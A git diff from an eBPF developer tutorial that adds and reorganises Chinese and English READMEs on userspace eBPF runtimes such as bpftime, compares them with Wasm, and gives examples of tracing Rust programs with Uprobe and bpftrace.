+这两种技术都依赖于底层的库来执行复杂任务,如 Wasm 所依赖的 `Wasi-nn` 来进行神经网络处理。与这些外部API 交互时,特别是在 Wasm 的环境下,需要进行更多的验证和运行时检查,这可能导致额外的性能损耗。而eBPF则提供了一个更为性能中心化的策略,其验证器确保了代码在主机上的安全执行,而不需要运行时的额外开销。 + +在语言支持上,由于 eBPF 的专业特性,其语言选择较为有限,通常是 C 和 Rust。而Wasm则支持更多的编程语言,包括但不限于 C、C++、Rust、Go、Python、Java和C#。这使得Wasm在跨平台部署上有更大的灵活性,但也可能因为不恰当的语言选择引入更多的性能开销。 + +为了给大家提供一个直观的对比,我们在 [https://github.com/eunomia-bpf/bpf-benchmark](https://github.com/eunomia-bpf/bpf-benchmark)中展示了eBPF和Wasm运行时的性能比较。 + +从更宏观的角度看,eBPF运行时和Wasm实际上可以被视为是相互补充的。尽管 eBPF 拥有出色的验证器机制来确保运行时安全性,但由于其编程语言的局限性和相对较高的开发难度,它并不总是适合作为业务逻辑的首选运行时。反之,eBPF 更适用于像网络流量转发、可观测性和 livepatch 这样的高专业性任务。相对而言,Wasm 运行时可以作为 Serverless 的运行时平台、插件系统和轻量级虚拟化等场景的首选。这两者都有自己的优势,但它们的选择取决于特定的用例和优先级。 + +## bpftime 快速入门 + +使用`bpftime`,您可以使用熟悉的工具(如clang和libbpf)构建eBPF应用程序,并在用户空间中执行它们。例如,`malloc` eBPF程序使用uprobe跟踪malloc调用,并使用哈希映射对其进行统计。 + +您可以参考[documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test)上的构建项目的方法,或者使用来自[GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime)的容器映像。 + +要开始,请构建并运行一个基于libbpf的eBPF程序,使用以下命令行: + +```console +make -C example/malloc # 构建示例的eBPF程序 +bpftime load ./example/malloc/malloc +``` + +在另一个shell中,运行带有eBPF的目标程序: + +```console +$ bpftime start ./example/malloc/victim +Hello malloc! +malloc called from pid 250215 +continue malloc... +malloc called from pid 250215 +``` + +您还可以动态地将eBPF程序附加到正在运行的进程上: + +```console +$ ./example/malloc/victim & echo $! # 进程ID为101771 +[1] 101771 +101771 +continue malloc... +continue malloc... +``` + +然后附加到该进程: + +```console +$ sudo bpftime attach 101771 # 您可能需要以root身份运行make install +Inject: "/root/.bpftime/libbpftime-agent.so" +成功注入。ID: 1 +``` + +您可以看到原始程序的输出: + +```console +$ bpftime load ./example/malloc/malloc +... +12:44:35 + pid=247299 malloc calls: 10 + pid=247322 malloc calls: 10 +``` + +或者,您也可以直接在内核eBPF中运行我们的示例eBPF程序,以查看类似的输出: + +```console +$ sudo example/malloc/malloc +15:38:05 + pid=30415 malloc calls: 1079 + pid=30393 malloc calls: 203 + pid=29882 malloc calls: 1076 + pid=34809 malloc calls: 8 +``` + +有关更多详细信息,请参阅[documents/usage.md](https://eunomia.dev/bpftime/documents/usage)。 + +## 总结与前景 + +用户空间的eBPF运行时正在打破边界,将eBPF的能力从内核扩展到了更广阔的领域。这种扩展带来了显著的性能、灵活性和安全性提升。例如,`bpftime`运行时显示了其在某些低级性能场景下,甚至超越了像 Wasm 这样的其他技术。也有越来越多的应用将用户空间的 eBPF 用于快速补丁、轻量级虚拟化、网络过滤等场景。 + +Wasm 的主要焦点在于可移植性、轻量级虚拟化、安全性、多语言等等,而 eBPF 则针对那些对性能有严格要求的基础设施任务提供了更多的性能优势和动态插桩特性。选择哪种技术取决于特定的需求和优先级。随着它们的进一步发展,用户空间的eBPF运行时正在成为云原生技术堆栈中的重要部分,为业界带来前所未有的安全、效率和创新的组合。 + +> 我们诚邀您深入探索用户空间eBPF的世界,您可以从我们的项目 [https://github.com/eunomia-bpf/bpftime](https://github.com/eunomia-bpf/bpftime) 开始。您的贡献、反馈或仅仅是对此工具的使用和 star,都可以为我们的社区带来巨大价值。 +> +> 若您在研究中采用了我们的`bpftime`项目,请[引用我们的仓库](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff)。我们期待您的宝贵意见和反馈,您可以通过 GitHub 仓库的 issue、邮箱 [yunwei356@gmail.com](mailto:yunwei356@gmail.com) 或微信 yunwei2567 与我们联系。 + +## 参考资料 + +1. bpftime: +2. ubpf: +3. rbpf: +4. Oko: +5. RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices: +6. DPDK eBPF Support: +7. Solana: +8. eBPF for Windows (Work-In-Progress): +9. Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers: diff --git a/src/36-userspace-ebpf/README_en.md b/src/36-userspace-ebpf/README_en.md deleted file mode 100644 index 1d5203a..0000000 --- a/src/36-userspace-ebpf/README_en.md +++ /dev/null @@ -1,218 +0,0 @@ -# Userspace eBPF Runtimes: Overview and Applications - -Yusheng Zheng - -In this blog post, we'll dive into the world of eBPF in userspace. While many are familiar with kernel-based eBPF, userspace eBPF runtimes have been making significant strides and offer compelling use cases. We will also compare userspace eBPF runtimes with Wasm runtimes, another popular technology in the cloud-native and edge computing landscape. Among these, we're excited to introduce [bpftime](https://github.com/eunomia-bpf/bpftime). Powered by an LLVM `JIT/AOT` backend, our benchmarks suggest that bpftime stands out as one of the fastest userspace eBPF runtimes available. - -## Introduction to eBPF - -### What is eBPF? - -eBPF, which stands for "extended Berkeley Packet Filter," is a revolutionary technology that facilitates the dynamic tracing and monitoring of kernel operations without modifying kernel source code or rebooting the system. Originally designed for network packet filtering, eBPF has evolved to support a wide range of applications, from performance analysis to security, making it a versatile tool in a system administrator's arsenal. - -The story of eBPF begins with the Berkeley Packet Filter (BPF), introduced in the early 1990s as a way to filter and capture network packets efficiently. Over the years, BPF proved to be an invaluable asset, but there was room for improvement. eBPF emerged as an advanced iteration of BPF, equipped with a richer instruction set and the capability to interact with kernel data structures directly. - -The Linux kernel adopted eBPF around 2014, and since then, its popularity and adoption have skyrocketed. Key contributors to the Linux kernel worked diligently to evolve eBPF from a simple packet filter to a generic and powerful bytecode engine. - -### Its significance in modern computing and network solutions - -In today's complex computing environments, the need for real-time data and insights is paramount. eBPF shines in this regard, allowing developers and administrators to introspect and modify system behaviors on the fly. - -Given its dynamic nature, eBPF has become a cornerstone of modern networking solutions. It enables fine-grained traffic control, load balancing, and security enforcement at the kernel level, ensuring optimal performance and security. Furthermore, in the realm of observability, eBPF provides granular insights into system calls, hardware events, and more, facilitating proactive problem detection and resolution. - -### eBPF: from kernel runtime to userspace runtime - -While the initial design of eBPF was deeply embedded within the kernel, the demand for similar functionality in userspace applications led to the evolution of userspace eBPF runtimes. These runtimes allow developers to leverage eBPF's capabilities outside the kernel, expanding its utility and applicability. Userspace eBPF runtimes make it feasible to apply eBPF's prowess to a broader set of applications, from custom network protocols to novel security solutions, further cementing eBPF's role as a transformative technology in the computing landscape. - -## Userspace eBPF Runtimes and Their Role - -### What is a userspace eBPF runtime? - -A userspace eBPF runtime provides a platform outside of the kernel to run eBPF programs. While one of eBPF's standout attributes is its capability to execute code within the kernel space, offering rapid observability and data aggregation, there are scenarios where having a userspace alternative becomes valuable. These userspace runtimes extend the reach of eBPF's versatility to areas beyond kernel integrations and often serve as experimental grounds, debugging tools, or frameworks for specific use cases. - -### Introduction to specific runtimes - -#### **ubpf** - -[uBPF](https://github.com/iovisor/ubpf) was among the early attempts to bring eBPF to the userspace. Conceived primarily as a proof-of-concept, it served as a user-space interpretation of an eBPF interpreter combined with an x86_64 and arm64 JIT. Despite its origins as an early prototype, uBPF garnered attention and was utilized as a foundation for high-performance networking projects such as DPDK and Oko. Its non-GPL licensing (Apache) makes it favorable for a wide range of projects, inclusive of proprietary ones. However, as of recent, uBPF is catching up with kernel developments, particularly with contributions from Microsoft for its eBPF Windows implementation. However, develop ubpf and rbpf programs may require a specific toolchain, which may be a barrier for some users. ubpf only have a limited hashmap implementation, which may not be enough for some users. - -#### **rbpf** - -[rbpf](https://github.com/qmonnet/rbpf) is heavily influenced by uBPF but with an emphasis on Rust, a language renowned for its memory safety guarantees. The creation of rbpf was driven by a desire to explore the intersections of eBPF and Rust. While not as widespread in adoption, notable users of rbpf include the Solana team, employing it for blockchain tools with eBPF-driven smart contracts. One of rbpf's advantages lies in its licensing (MIT), allowing for broad reuse across various projects. rbpf also lacks eBPF map support, and only has JIT support for x86_64. - -#### **bpftime** - -Built atop LLVM JIT/AOT, [bpftime](https://github.com/eunomia-bpf/bpftime) is a cutting-edge, high-performance eBPF runtime designed exclusively for userspace operations. It stands out with its rapid Uprobe capabilities and Syscall hooks, notably outperforming the kernel Uprobe by a tenfold margin. Additionally, bpftime offers programmatic syscall hooking, shared memory maps, and compatibility with familiar toolchains like libbpf and clang. Its design addresses some kernel eBPF limitations and outpaces plugin systems like the Wasm runtime in certain aspects. - -## Why is Having a Userspace Version of eBPF Interesting? - -eBPF, while renowned for its kernel-space operations, has observed a growing interest in its userspace adaptations. Here's why migrating eBPF to userspace is capturing the attention of technologists: - -### Enhanced Performance - -In kernel operations, the Uprobe component of eBPF is often beleaguered by performance inefficiencies, primarily due to the overheads introduced by context switches. In latency-sensitive applications, these inefficiencies can be detrimental, affecting real-time monitoring and data processing. By transitioning to userspace, eBPF can bypass these context switch related delays, leading to a more optimized performance. Runtimes like `bpftime` exemplify this, offering substantial performance improvements compared to their kernel counterparts. - -### Flexibility and Integration - -Userspace eBPF runtimes champion flexibility. Unlike some alternatives, such as the Wasm runtime, which might necessitate manual integrations, userspace eBPF provides the boon of automatic instrumentation. This means they can be seamlessly introduced into running processes without the need for cumbersome restarts or recompilations, ensuring smoother operational flows. - -### Augmented Security - -Operating in kernel mode, eBPF programs require root access, which can inadvertently expand the attack surface, making systems susceptible to vulnerabilities like container escapes or even potential kernel exploits. Userspace runtimes, however, operate outside this high-risk zone. By functioning in userspace, they demand fewer privileges, inherently reducing the potential avenues for security breaches. - -### Debugging and Licensing Flexibility - -One of the innate advantages of userspace eBPF runtimes is the ease with which developers can debug their code. The accessibility to integrate breakpoints in a userspace interpreter is a marked advantage over the relatively constrained debugging capabilities in kernel eBPF. Additionally, the licensing flexibility of userspace eBPF runtimes, typically offered under licenses like Apache or MIT, ensures they can be paired with a diverse range of projects, including proprietary ones, sidestepping the GPL constraints associated with kernel code. - -## Use Cases: Existing eBPF Userspace Applications - -Userspace eBPF is being utilized in a number of notable projects, each harnessing the unique capabilities of eBPF to enhance their functionalities. Here's how Userspace eBPF is currently utilized in various applications: - -1. [**Oko:**](https://github.com/Orange-OpenSource/Oko) - - Oko is an extension of Open vSwitch-DPDK that provides runtime extension with BPF programs. It enables the use of BPF programs to process packets in userspace, providing flexible packet processing and facilitating the integration of Open vSwitch with other systems. - -1. [**DPDK eBPF Support:**](https://www.dpdk.org/wp-content/uploads/sites/35/2018/10/pm-07-DPDK-BPFu6.pdf) - - The DPDK (Data Plane Development Kit) eBPF support facilitates fast packet processing by enabling the use of eBPF programs in userspace, which can be loaded and run to analyze network packets. This enhances the flexibility and programmability of network applications without requiring kernel modifications. - -1. [**Solana:**](https://solana.com/) - - Solana utilizes eBPF to implement a JIT (Just-In-Time) compiler, which is essential for executing smart contracts on its blockchain network. The use of eBPF ensures safety, performance, and architecture agnosticism, thus allowing efficient execution of smart contracts across validator nodes on the Solana blockchain. - -1. [**eBPF for Windows (Work-In-Progress):**](https://github.com/microsoft/ebpf-for-windows) - - This project is aimed at bringing the eBPF toolchains and APIs familiar in the Linux ecosystem to Windows, allowing existing eBPF toolchains to be utilized on top of Windows. This demonstrates a promising endeavor to extend the capabilities of eBPF beyond Linux, although it's still a work in progress. - -The benefits of using eBPF in these applications include: - -- **Flexibility:** eBPF provides a flexible framework for running programs in the kernel or userspace, enabling developers to extend the functionality of existing systems without modifying their core code. -- **Performance:** By allowing JIT compilation and efficient packet processing, eBPF can significantly enhance the performance of network applications and blockchain smart contract execution. -- **Safety and Security:** The eBPF framework provides mechanisms for verifying the safety properties of programs before execution, thus ensuring the integrity and security of the systems it is integrated with. -- **Cross-platform Capability:** The architecture-agnostic nature of eBPF instruction set enables cross-platform compatibility, as seen in projects like Solana and the work-in-progress eBPF for Windows. - -These attributes make eBPF a powerful tool for augmenting a variety of applications, ranging from network processing to blockchain smart contract execution, and beyond. There are also some papers that discuss the use of eBPF in userspace: - -1. [**RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices**](https://www.usenix.org/conference/usenixsecurity22/presentation/he-yi): - - This paper introduces a new hotpatching framework named RapidPatch, which is designed to facilitate the propagation of patches by installing generic patches on heterogeneous embedded devices without disrupting other tasks running on them. - - Furthermore, RapidPatch proposes two types of eBPF patches for different types of vulnerabilities and develops an eBPF patch verifier to ensure patch safety. - -1. [**Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers**](https://arxiv.org/abs/2210.03432): - - This paper presents Femto-Containers, a novel framework that enables the secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices over a network. - - The framework is implemented and provided in RIOT, a popular open source IoT operating system, with an emphasis on secure deployment, execution, and isolation of small virtual software functions on low-power IoT devices, over the network. - - The paper discusses the implementation of a Femto-Container hosting engine integrated within a common low-power IoT operating system (RIOT), enhancing it with the ability to start, update, or terminate Femto-Containers on demand, securely over a standard IPv6/6LoWPAN network. - -These papers delve into pertinent advancements concerning firmware patching and lightweight virtualization, demonstrating innovations that address critical challenges in the domains of real-time embedded systems and low-power IoT microcontrollers respectively. - -## Userspace eBPF Runtime vs Wasm Runtime - -In the evolving landscape of cloud-native and edge computing, both eBPF (extended Berkeley Packet Filter) and Wasm (WebAssembly) have emerged as powerful tools. However, they come with their own set of design principles and trade-offs. - -### A Comparison of eBPF and Wasm - -**eBPF**: - -- **Philosophy**: eBPF prioritizes performance, often making it the choice for real-time kernel operations and high-throughput networking tasks. -- **Security**: While performance takes the forefront, security in eBPF is ensured through the use of a verifier, ensuring that all programs are safe to run without causing kernel panics or infinite loops. - -**Wasm**: - -- **Philosophy**: Originally designed for the web, Wasm places a higher emphasis on portability and security. It was conceived to execute code nearly as fast as running native machine code and ensures safety in hostile environments like web browsers. -- **Security**: The primary security model for Wasm revolves around Software Fault Isolation (SFI). This model guarantees safe execution by enforcing sandboxing, even though this can introduce some runtime overheads. - -For both technologies, reliance on underlying libraries for complex operations is paramount. For instance, Wasm leans on libraries like `Wasi-nn` for neural network operations. However, when interfacing with such external APIs, especially in Wasm's context, there's a need for additional validation and runtime checks, sometimes leading to substantial performance costs. eBPF, when embedded within the host, capitalizes on its verifier to ensure code safety, offering a more performance-centric approach. - -On the language support front, while eBPF's niche and specialized nature mean limited language support, Wasm boasts a broader language portfolio due to its origin and design for the web. - -## bpftime Quick Start - -With `bpftime`, you can build eBPF applications using familiar tools like clang and libbpf, and execute them in userspace. For instance, the `malloc` eBPF program traces malloc calls using uprobe and aggregates the counts using a hash map. - -You can refer to [documents/build-and-test.md](https://eunomia.dev/bpftime/documents/build-and-test) for how to build the project, or using the container images from [GitHub packages](https://github.com/eunomia-bpf/bpftime/pkgs/container/bpftime). - -To get started, you can build and run a libbpf based eBPF program starts with `bpftime` cli: - -```console -make -C example/malloc # Build the eBPF program example -bpftime load ./example/malloc/malloc -``` - -In another shell, Run the target program with eBPF inside: - -```console -$ bpftime start ./example/malloc/victim -Hello malloc! -malloc called from pid 250215 -continue malloc... -malloc called from pid 250215 -``` - -You can also dynamically attach the eBPF program with a running process: - -```console -$ ./example/malloc/victim & echo $! # The pid is 101771 -[1] 101771 -101771 -continue malloc... -continue malloc... -``` - -And attach to it: - -```console -$ sudo bpftime attach 101771 # You may need to run make install in root -Inject: "/root/.bpftime/libbpftime-agent.so" -Successfully injected. ID: 1 -``` - -You can see the output from original program: - -```console -$ bpftime load ./example/malloc/malloc -... -12:44:35 - pid=247299 malloc calls: 10 - pid=247322 malloc calls: 10 -``` - -Alternatively, you can also run our sample eBPF program directly in the kernel eBPF, to see the similar output: - -```console -$ sudo example/malloc/malloc -15:38:05 - pid=30415 malloc calls: 1079 - pid=30393 malloc calls: 203 - pid=29882 malloc calls: 1076 - pid=34809 malloc calls: 8 -``` - -See [documents/usage.md](https://eunomia.dev/bpftime/documents/usage) for more details. - -## Conclusion - -Userspace eBPF runtimes are an exciting development that expands the capabilities of eBPF beyond the kernel. As highlighted in this post, they offer compelling benefits like enhanced performance, flexibility, and security compared to kernel-based eBPF. Runtimes like bpftime demonstrate the potential for substantial speedups, even outperforming alternatives like Wasm runtimes in certain dimensions like low-level performance. - -With innovative frameworks like RapidPatch and Femto-Containers utilizing userspace eBPF for patching and lightweight virtualization respectively, we are witnessing pioneering use cases that address critical challenges in embedded systems and IoT domains. As eBPF continues its evolution in userspace, we can expect even more creative applications that augment everything from smart contracts to network protocols. - -While alternatives like Wasm certainly have their place with a strong emphasis on web portability and security, eBPF's specialized nature gives it an edge for performance-critical tasks. Ultimately, the choice between the two depends on the specific use case and priorities. As they continue to evolve, userspace eBPF runtimes are cementing their position as an indispensable part of the cloud-native technology stack, offering an unparalleled combination of safety, efficiency and innovation. - -> We encourage our readers to dive deep into the world of userspace eBPF, starting with our bpftime GitHub repository: Contributions, feedback, or simply using the tool can further the cause and provide invaluable insights to the community. -> -> If you use our project in research, please [cite our repo](https://github.com/eunomia-bpf/bpftime/blob/master/CITATION.cff). - -## reference - -1. bpftime: -2. ubpf: -3. rbpf: -4. Oko: -5. RapidPatch: Firmware Hotpatching for Real-Time Embedded Devices: -6. DPDK eBPF Support: -7. Solana: -8. eBPF for Windows (Work-In-Progress): -9. Femto-Containers: Lightweight Virtualization and Fault Isolation For Small Software Functions on Low-Power IoT Microcontrollers: diff --git a/src/37-uprobe-rust/README.md b/src/37-uprobe-rust/README.md index 191c3d7..991871b 100644 --- a/src/37-uprobe-rust/README.md +++ b/src/37-uprobe-rust/README.md @@ -1,30 +1,30 @@ -# eBPF 实践:使用 Uprobe 追踪用户态 Rust 应用 +# eBPF Practice: Tracing User Space Rust Applications with Uprobe -eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 +eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro-programs" in kernel mode, thus changing system behavior or collecting granular performance data without modifying the kernel code. -本文讨论如何使用 Uprobe 和 eBPF 追踪用户态 Rust 应用,包括如何获取符号名称并 attach、获取函数参数、获取返回值等。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 +This article discusses how to trace user space Rust applications with Uprobe and eBPF, including how to obtain symbol names and attach them, get function parameters, get return values, etc. This article is part of the eBPF developer tutorial, more detailed content can be found here: The source code is open source in the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). ## Uprobe -Uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。 +Uprobe is a user space probe. Uprobe probes allow dynamic instrumentation in user space programs, with instrumentation locations including: function entry points, specific offsets, and function return points. When we define a Uprobe, the kernel creates a fast breakpoint instruction (the int3 instruction on x86 machines) at the attached instruction. When the program executes this instruction, the kernel triggers an event, the program falls into kernel mode, and the probe function is called in a callback manner. After the probe function is executed, it returns to user mode to continue executing subsequent instructions. -uprobe 适用于在用户态去解析一些内核态探针无法解析的流量,例如 http2 流量,https 流量,同时也可以分析程序运行时、业务逻辑等。关于 Uprobe 的更多信息,可以参考: +Uprobe is useful for parsing traffic in user space that cannot be parsed by kernel probes, such as http2 traffic, https traffic, and can also analyze runtime program, business logic, etc. For more information about Uprobe, you can refer to: -- [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) -- [eBPF 实践教程:使用 uprobe 捕获 Golang 的协程切换](../31-goroutine/README.md) -- [eBPF 实践教程:使用 uprobe 捕获用户态 http2 流量](../32-http2/README.md) +- [eBPF practice tutorial: Use Uprobe to capture plaintext SSL/TLS data from various libraries](../30-sslsniff/README.md) +- [eBPF practice tutorial: Use Uprobe to capture Golang coroutine switching](../31-goroutine/README.md) +- [eBPF practice tutorial: Use Uprobe to capture user space http2 traffic](../32-http2/README.md) -Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF Uprobe 程序,和内核态的 eBPF 兼容,由于避免了内核态和用户态之间的上下文切换,bpftime 的 Uprobe 开销比内核少约 10 倍,并且也更容易扩展。 +Running Uprobe in kernel mode eBPF might also produce significant performance overhead, in which case you might consider using user space eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user-space eBPF runtime based on LLVM JIT/AOT. It can run eBPF Uprobe programs in user mode and is compatible with kernel mode eBPF. Because it avoids context switching between user and kernel modes, bpftime's Uprobe overheads are about 10 times less than the kernel's, and it also more easy to extend. ## Rust -Rust 是一种开源的系统编程语言,注重安全、速度和并行性。它于2010年由Graydon Hoare在Mozilla研究中心开发,并于2015年发布了第一个稳定版本。Rust 语言的设计哲学旨在提供C++的性能优势,同时大幅减少内存安全漏洞。Rust在系统编程领域逐渐受到欢迎,特别是在需要高性能、安全性和可靠性的应用场景,例如操作系统、文件系统、游戏引擎、网络服务等领域。许多大型技术公司,包括Mozilla、Google、Microsoft和Amazon等,都在使用或支持Rust语言。 +Rust is an open-source systems programming language that focuses on safety, speed, and concurrency. It was developed by Graydon Hoare at the Mozilla Research Center in 2010 and released its first stable version in 2015. The design philosophy of Rust language is to provide the performance advantages of C++ while greatly reducing memory safety vulnerabilities. Rust is gradually popular in the field of systems programming, especially in applications that require high performance, security, and reliability, such as operating systems, file systems, game engines, network services, etc. Many large technology companies, including Mozilla, Google, Microsoft, and Amazon, are using or supporting the Rust language. -可以参考 [Rust 官方网站](https://www.rust-lang.org/) 了解更多 Rust 语言的信息,并安装 Rust 的工具链。 +You can refer to the [official Rust website](https://www.rust-lang.org/) for more information about Rust language and install the Rust toolchain. -## 最简单的例子:Symbol name mangling +## Simplest example: Symbol name mangling -我们先来看一个简单的例子,使用 Uprobe 追踪 Rust 程序的 `main` 函数,代码如下: +Let's start with a simple example, tracing the `main` function of a Rust program with Uprobe, with the code as follows: ```rust pub fn hello() -> i32 { @@ -37,7 +37,7 @@ fn main() { } ``` -构建和尝试获取符号: +Build and try to get the symbol: ```console $ cd helloworld @@ -46,9 +46,9 @@ $ nm helloworld/target/release/helloworld | grep hello 0000000000008940 t _ZN10helloworld4main17h2dce92cb81426b91E ``` -我们会发现,对应的符号被转换为了 `_ZN10helloworld4main17h2dce92cb81426b91E`,这是因为 rustc 使用 [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) 来为代码生成过程中使用的符号编码一个唯一的名称。编码后的名称会被链接器用于将名称与所指向的内容关联起来。可以使用 -C symbol-mangling-version 选项来控制符号名称的处理方法。 +We find that the corresponding symbol has been converted to `_ZN10helloworld4main17h2dce92cb81426b91E`. This is because rustc uses [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) to encode a unique name for the symbols used in the code generation process. The encoded name will be used by the linker to associate the name with the content it points to. The -C symbol-mangling-version option can be used to control the handling of symbol names. -我们可以使用 [`rustfilt`](https://crates.io/crates/rustfilt) 工具来解析和获取对应的符号: +We can use the [`rustfilt`](https://crates.io/crates/rustfilt) tool to parse and obtain the corresponding symbol: ```console $ cargo install rustfilt @@ -59,7 +59,7 @@ $ rustfilt -i name.txt | grep hello 0000000000008b60 t helloworld::main ``` -接下来我们可以尝试使用 bpftrace 跟踪对应的函数: +Next we can try to use bpftrace to trace the corresponding function: ```console $ sudo bpftrace -e 'uprobe:helloworld/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' @@ -67,9 +67,9 @@ Attaching 1 probe... Function hello-world called ``` -## 一个奇怪的现象:多次调用、获取参数 +## A strange phenomenon: multiple calls, getting parameters -对于一个更复杂的例子,包含多次调用和获取参数: +For a more complex example, which includes multiple calls and parameter fetching: ```rust use std::env; @@ -97,7 +97,7 @@ fn main() { } ``` -我们再次进行类似的操作,会发现一个奇怪的现象: +We repeat a similar operation and notice a strange phenomenon: ```console $ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' @@ -105,7 +105,7 @@ Attaching 1 probe... Function hello-world called ``` -这时候我们希望 hello 函数运行多次,但 bpftrace 中只输出了一次调用: +At this point we expect the hello function to run several times, but bpftrace only prints out one call: ```console $ args/target/release/helloworld 1 2 3 4 @@ -119,7 +119,7 @@ Hello, world! 4 in 5 return value: 9 ``` -而且看起来 bpftrace 并不能正确获取参数: +And it appears that bpftrace cannot correctly get the parameter: ```console $ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called %d\n" @@ -128,7 +128,7 @@ Attaching 1 probe... Function hello-world called 63642464 ``` -Uretprobe 捕捉到了第一次调用的返回值: +The Uretprobe did catch the return value of the first call: ```console $ sudo bpftrace -e 'uretprobe:args/tar @@ -139,10 +139,10 @@ Attaching 1 probe... Function hello-world called 6 ``` -这可能是由于 Rust 没有稳定的 ABI。 Rust,正如它迄今为止所存在的那样,保留了以任何它想要的方式对这些结构成员进行排序的权利。 因此,被调用者的编译版本可能会完全按照上面的方式对成员进行排序,而调用库的编程的编译版本可能会认为它实际上是这样布局的: +This may due to Rust does not have a stable ABI. Rust, as it has existed so far, has reserved the right to order those struct members any way it wants. So the compiled version of the callee might order the members exactly as above, while the compiled version of the programming calling into the library might think its actually laid out like this: -TODO: 进一步分析(未完待续) +TODO: Further analysis (to be continued) -## 参考资料 +## References - diff --git a/src/37-uprobe-rust/README.zh.md b/src/37-uprobe-rust/README.zh.md new file mode 100644 index 0000000..191c3d7 --- /dev/null +++ b/src/37-uprobe-rust/README.zh.md @@ -0,0 +1,148 @@ +# eBPF 实践:使用 Uprobe 追踪用户态 Rust 应用 + +eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 + +本文讨论如何使用 Uprobe 和 eBPF 追踪用户态 Rust 应用,包括如何获取符号名称并 attach、获取函数参数、获取返回值等。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 + +## Uprobe + +Uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后序的指令。 + +uprobe 适用于在用户态去解析一些内核态探针无法解析的流量,例如 http2 流量,https 流量,同时也可以分析程序运行时、业务逻辑等。关于 Uprobe 的更多信息,可以参考: + +- [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) +- [eBPF 实践教程:使用 uprobe 捕获 Golang 的协程切换](../31-goroutine/README.md) +- [eBPF 实践教程:使用 uprobe 捕获用户态 http2 流量](../32-http2/README.md) + +Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF Uprobe 程序,和内核态的 eBPF 兼容,由于避免了内核态和用户态之间的上下文切换,bpftime 的 Uprobe 开销比内核少约 10 倍,并且也更容易扩展。 + +## Rust + +Rust 是一种开源的系统编程语言,注重安全、速度和并行性。它于2010年由Graydon Hoare在Mozilla研究中心开发,并于2015年发布了第一个稳定版本。Rust 语言的设计哲学旨在提供C++的性能优势,同时大幅减少内存安全漏洞。Rust在系统编程领域逐渐受到欢迎,特别是在需要高性能、安全性和可靠性的应用场景,例如操作系统、文件系统、游戏引擎、网络服务等领域。许多大型技术公司,包括Mozilla、Google、Microsoft和Amazon等,都在使用或支持Rust语言。 + +可以参考 [Rust 官方网站](https://www.rust-lang.org/) 了解更多 Rust 语言的信息,并安装 Rust 的工具链。 + +## 最简单的例子:Symbol name mangling + +我们先来看一个简单的例子,使用 Uprobe 追踪 Rust 程序的 `main` 函数,代码如下: + +```rust +pub fn hello() -> i32 { + println!("Hello, world!"); + 0 +} + +fn main() { + hello(); +} +``` + +构建和尝试获取符号: + +```console +$ cd helloworld +$ cargo build +$ nm helloworld/target/release/helloworld | grep hello +0000000000008940 t _ZN10helloworld4main17h2dce92cb81426b91E +``` + +我们会发现,对应的符号被转换为了 `_ZN10helloworld4main17h2dce92cb81426b91E`,这是因为 rustc 使用 [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) 来为代码生成过程中使用的符号编码一个唯一的名称。编码后的名称会被链接器用于将名称与所指向的内容关联起来。可以使用 -C symbol-mangling-version 选项来控制符号名称的处理方法。 + +我们可以使用 [`rustfilt`](https://crates.io/crates/rustfilt) 工具来解析和获取对应的符号: + +```console +$ cargo 